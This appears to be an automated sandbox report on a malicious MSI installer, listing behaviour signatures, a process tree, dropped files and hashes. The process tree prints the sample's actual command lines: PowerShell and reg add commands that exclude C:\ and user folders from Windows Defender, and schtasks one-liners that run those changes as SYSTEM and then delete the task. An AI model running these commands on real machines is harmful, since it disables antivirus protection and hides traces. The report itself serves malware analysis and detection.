Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    30/07/2026, 02:13

General

  • Target
    Install_28n002.msi
  • Size 5.7MB
  • Sample260730-cnes2axdpd
  • SHA256 c934ce2e4f8cb4f165edecb51d91390b00f5084809bad25c0a5a189271fa5fe8
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 3 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 5 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Install_28n002.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4568
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4224
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:936
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 87D6634C0E351259E9ADE04B2B1AF336 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:464
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:360
  • C:\Users\Public\Tz0hEC\5anpFs.exe
    "C:\Users\Public\Tz0hEC\5anpFs.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:6048
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Tz0hEC\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5212
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Tz0hEC\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5308
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1172
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4312
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4740
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:5060
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:1028
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:5812
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:3376
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:6028
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4040
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:4632
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2996
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4412
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3264
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:5608
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3008
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4532
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2524
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2344
                        • C:\Program Files (x86)\8ZHltA\8ZHltA.exe
                          "C:\Program Files (x86)\8ZHltA\8ZHltA.exe"
                          2⤵
                            PID:3560
                        • C:\Windows\system32\cmd.exe
                          cmd.exe
                          1⤵
                            PID:1900
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Tz0hEC" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:1296
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Tz0hEC" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:200
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3948
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:3396
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2484
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:3924
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3656
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:464
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                            1⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2612
                            • C:\Windows\System32\reg.exe
                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                              2⤵
                              • Windows security bypass
                              PID:884
                          • C:\Program Files (x86)\8ZHltA\8ZHltA.exe
                            "C:\Program Files (x86)\8ZHltA\8ZHltA.exe"
                            1⤵
                              PID:1860
                            • C:\Program Files (x86)\8ZHltA\8ZHltA.exe
                              "C:\Program Files (x86)\8ZHltA\8ZHltA.exe"
                              1⤵
                                PID:5128

                              Network

                                    MITRE ATT&CK Enterprise v16

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    e5a8e96.rbs

                                    • Path C:\Config.Msi\e5a8e96.rbs
                                    • Size 7KB
                                    • SHA256 718f32199f3f57dec63fcb4f5a56d838b444d23928e0fc18596cc55ca8020357
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    8ZHltA.exe

                                    • Path C:\Program Files (x86)\8ZHltA\8ZHltA.exe
                                    • Size 145KB
                                    • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    XPSPLOG.dll

                                    • Path C:\Program Files (x86)\8ZHltA\XPSPLOG.dll
                                    • Size 4.6MB
                                    • SHA256 24127f951e9a15e256bdcada9f794cee97283cca0a0d2ef685bbe968b7272131
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    XPSPLOG.dll

                                    • Path C:\Program Files (x86)\8ZHltA\XPSPLOG.dll
                                    • Size 768KB
                                    • SHA256 7aa6e02be0f301eaaaff34355148bd8dbbbec11ee8443a2a4d2e27e7964890cb
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    XPSPLOG.dll

                                    • Path C:\Program Files (x86)\8ZHltA\XPSPLOG.dll
                                    • Size 256KB
                                    • SHA256 637a504f128482f8e1185cc9665f186ebc096a4767b589950e9c49141d3a3843
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    image.png

                                    • Path C:\Program Files (x86)\8ZHltA\image.png
                                    • Size 4.9MB
                                    • SHA256 9bb0b4fcc25aa893367317217d9faef1a81d04bd9000966d4c2dd804c2863b63
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    thumbs.db

                                    • Path C:\Program Files (x86)\8ZHltA\thumbs.db
                                    • Size 358KB
                                    • SHA256 bea26d5b953a6abaa32f62b6dae60e124afd343b34a48e4ecdb37abeb10c8319
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    5anpFs.exe

                                    • Path C:\Users\Public\Tz0hEC\5anpFs.exe
                                    • Size 135KB
                                    • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    UxEnhance64.dll

                                    • Path C:\Users\Public\Tz0hEC\UxEnhance64.dll
                                    • Size 3.1MB
                                    • SHA256 5bc7440e4f6fe56bbf107a6c177b9afdc2886b0e880f5cc8e384245a79957d83
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    adoresd.dat

                                    • Path C:\Users\Public\Tz0hEC\adoresd.dat
                                    • Size 4.8MB
                                    • SHA256 e0553b835111d401ca66c74f049505893e09dc67c3b6de43ecf70b31979fabf7
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    msadox.tb

                                    • Path C:\Users\Public\Tz0hEC\msadox.tb
                                    • Size 8KB
                                    • SHA256 8b97eef14d928b51e5281c5b269c7402e645eec276ed3e86a0e3f4cae500dd90
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    MSI959B.tmp

                                    • Path C:\Windows\Installer\MSI959B.tmp
                                    • Size 5.7MB
                                    • SHA256 f2f0cc6f7b1e3334ca03256781a86ab7c7c728a28de49714dde0e915fa4eb146
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    e5a8e95.msi

                                    • Path C:\Windows\Installer\e5a8e95.msi
                                    • Size 5.7MB
                                    • SHA256 c934ce2e4f8cb4f165edecb51d91390b00f5084809bad25c0a5a189271fa5fe8
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    metadata-2

                                    • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                    • Size 26.1MB
                                    • SHA256 a2fede77edd300ce2533904e9743ab1ec6fc770645763a7153af7fd066701429
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    {823f5b70-adbd-4e92-8977-53e8b036d377}_OnDiskSnapshotProp

                                    • Path \??\Volume{ca73a981-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{823f5b70-adbd-4e92-8977-53e8b036d377}_OnDiskSnapshotProp
                                    • Size 6KB
                                    • SHA256 ff233f001bdf8968734a76acabef9432d8c55b3c11909cbf7f4ac1048dddb0ae
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    memory/464-44-0x00007FFDC8F10000-0x00007FFDC8F22000-memory.dmp

                                    memory/464-16-0x00007FFDC8F10000-0x00007FFDC8F22000-memory.dmp

                                    memory/464-13-0x00007FFDBB000000-0x00007FFDBB652000-memory.dmp

                                    memory/464-12-0x00007FFDDEB90000-0x00007FFDDEB92000-memory.dmp

                                    memory/1316-59-0x00007FFDBB140000-0x00007FFDBB65E000-memory.dmp

                                    memory/1316-92-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-74-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-78-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-87-0x00000138EE000000-0x00000138EE08A000-memory.dmp

                                    memory/1316-88-0x00000138EE000000-0x00000138EE08A000-memory.dmp

                                    memory/1316-86-0x00000138EE000000-0x00000138EE08A000-memory.dmp

                                    memory/1316-85-0x00000138EE000000-0x00000138EE08A000-memory.dmp

                                    memory/1316-84-0x00000138EDF20000-0x00000138EDF6E000-memory.dmp

                                    memory/1316-67-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-94-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-95-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-58-0x00007FFDDEB90000-0x00007FFDDEB92000-memory.dmp

                                    memory/1316-64-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-66-0x00007FFDDEBA0000-0x00007FFDDEBA2000-memory.dmp

                                    memory/1316-72-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-73-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/1316-71-0x00000138ED660000-0x00000138EDF1E000-memory.dmp

                                    memory/3560-192-0x00000000008D0000-0x00000000008D1000-memory.dmp

                                    memory/3560-187-0x0000000074580000-0x0000000074CCA000-memory.dmp

                                    memory/3560-185-0x00000000008B0000-0x00000000008B1000-memory.dmp

                                    memory/3560-190-0x0000000003190000-0x0000000003979000-memory.dmp

                                    memory/3560-193-0x0000000003190000-0x0000000003979000-memory.dmp

                                    memory/3560-197-0x0000000003190000-0x0000000003979000-memory.dmp

                                    memory/3560-204-0x00000000026F0000-0x0000000002704000-memory.dmp

                                    memory/6048-118-0x000001A2A3EC0000-0x000001A2A3ECA000-memory.dmp

                                    memory/6048-115-0x000001A2A3EF0000-0x000001A2A3FA2000-memory.dmp

                                    memory/6048-114-0x000001A2A3ED0000-0x000001A2A3EEE000-memory.dmp

                                    memory/6048-111-0x000001A2A3E40000-0x000001A2A3E62000-memory.dmp